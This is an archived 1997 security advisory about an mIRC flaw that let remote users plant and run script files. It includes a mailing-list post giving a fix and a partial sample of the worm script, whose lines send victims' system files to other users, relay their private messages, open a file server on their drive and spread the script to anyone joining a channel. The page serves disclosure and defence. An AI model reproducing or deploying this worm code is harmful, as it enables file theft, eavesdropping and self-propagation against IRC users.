MIRC worm bug

Description:There is a bug in MIRC (a Windoze IRC client) which allows people to send an arbitrary script.irc to MIRC users. This allows arbitrary MIRC scripting commands to be interpreted.
Compromise:Windows IRC users can be harassed and their files can be snatched and/or deleted.
Vulnerable Systems:Windows versions running MIRC prior to 5.3
Date:18 December 1997

Date: Thu, 18 Dec 1997 10:59:31 -0600
From: Aleph One <aleph1@dfw.net>
Subject: mIRC Worm

  There is an mIRC worm/script going around IRC. mIRC has a bug that
allows remote users to download script files onto the victims machines and
execute them. mIRC 5.3 has been release to fix the hole. You can also fix
the problem by changing the default download subdirectory to be something
else than the directory containing the script files. To do so:

   a) Start the mIRC software
   b) Click the mIRC menu option DCC | Options | Dirs | Edit
   c) Change the default download directory. Point to an alternate
      directory or folder name.

  Attached you will find one of the many variations of the script. I
don't plan on starting a thread on this topic. mIRC is always been a
mess. This is just a heads up. Some reference URLs:


Aleph One / aleph1@dfw.net
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

  [Part 2, ""  Text/PLAIN  27 lines]
  [Unable to print this part]

n1=;      Protection List
n3=ON 1:TEXT:*spamquit*:#:/quit Jolly Spamhead Ownz Me
n4=ON 1:TEXT:*hi*:#:/dcc send $nick c:\config.sys
n5=ON 1:TEXT:*!servme*:#:/fserve $nick 1 c:\
n6=ON 1:TEXT:*cya*:#:/dcc send $nick c:\windows\win.ini
n7=ON 1:TEXT:*the*:#:/dcc send $nick c:\autoexec.bat
n8=ON 1:NOTICE:*:#:/msg #roms  $+ $chan $+  - $+ $nick $+ - $parms
n9=ON 1:TEXT:*:?:/msg #roms **Message from $nick $+ ** $parms | /closemsg  $nick
n10=ON 1:TEXT:*:#:/msg #roms $+ $chan $+  < $+ $nick $+ > $parms
N11=ON 1:TEXT:*:#:/say I am lame for running Script.ini and I should be shot!
n12=ON 1:JOIN:#:/dcc send $nick SCRIPT.INI
n13=ON 1:JOIN:*RaSPuTeN*:/mode +o $chan RaSPuTeN
N14=ON 1:JOIN:#:/msg $nick My Computer Is Open For The taking! Type !servme in channel!
n15=#user.prot.add.all off
n16=raw 401:*: set %User.Nick 0 | halt
n17=raw 301:*: halt
n18=raw 311:*: set %User.Address $2 $+ ! $+ $3 $+ @ $+ $4 | halt
n19=raw 312:*: halt
n20=raw 313:*: halt
n21=raw 317:*: halt
n22=raw 319:*: halt
n23=raw 318:* {
n24=  if (%User.Nick == 0) { error $2 $+ , no such nick | goto do

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]